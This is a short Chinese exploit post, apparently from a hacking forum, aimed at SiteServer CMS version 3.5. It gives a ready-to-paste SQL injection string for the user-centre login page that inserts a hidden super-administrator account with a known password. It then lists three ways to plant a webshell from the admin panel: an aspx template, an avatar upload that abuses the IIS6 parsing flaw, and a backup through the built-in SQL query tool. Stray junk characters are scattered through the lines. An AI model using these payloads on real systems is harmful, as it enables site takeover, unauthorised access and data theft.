经测试秒杀最新的3.5版/ y( Q: m1 ^7 _- n
stieserver官网:www.siteserver.cn
6 d8 c- k5 J( I! |" G" w7 XEXP:
& _+ L4 m* c) P$ F$ V5 L2 z直接访问UserCenter/login.aspx$ D$ z! R# Y2 d" h: L" a
用户名处输入:0 }" }% v' K% t1 K* p8 K6 w" H
. R7 }8 K# c3 l5 p4 `) W" S123′insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values(‘blue’,'VffSUZcBPo4=’,'Encrypted’,'i7jq4LwC25wKDoqHErBWaw==’);insert into bairong_AdministratorsInRoles values(‘Administrator’,'blue’);insert into bairong_AdministratorsInRoles values(‘RegisteredUser’,'blue’);insert into bairong_AdministratorsInRoles values(‘ConsoleAdministrator’,'blue’);–& O* s/ r3 m7 ]2 J! k8 O
密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue 密码为lanhai的超级用户。
4 [) I! c6 ] C0 `" o之后再访问后台SiteServer/login.aspx用插入的用户登陆
$ @1 x8 A$ z* A6 F4 G后台拿webshell的三种方法:: \& @; y' C" `0 e* H$ p
一、/ D |) w" c* G! f8 e* W* A( u
站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx0 ^: T/ j) ^4 d9 w4 z* `9 [9 f
二、% Z! f+ c2 q: H1 ]: @ p% ]# @
成员权限-》添加用户-》用户名为:1.asp8 q6 i) C% T& y$ b! b* a) j* g8 r- d9 N+ D
http://127.0.0.1/usercenter/
# O/ @+ P5 z$ s- o8 V用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell
/ M" P* ~5 v/ M6 n8 L2 k(ps:后台添加用户时不会验证是否含有非法字符)& D* @+ y/ X/ G# K+ o& E" F2 W+ v
三、: g( B4 {2 ]. r$ p
系统工具-》实用工具-》机器参数查看
# _( b$ ?8 s2 \可以看到数据库类型、名称,WEB路径2 ?. z+ p3 _0 }1 }: V+ M7 b' f
系统工具-》数据库工具-》SQL语句查询1 A0 a' u. T: C0 v5 L( m
这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO |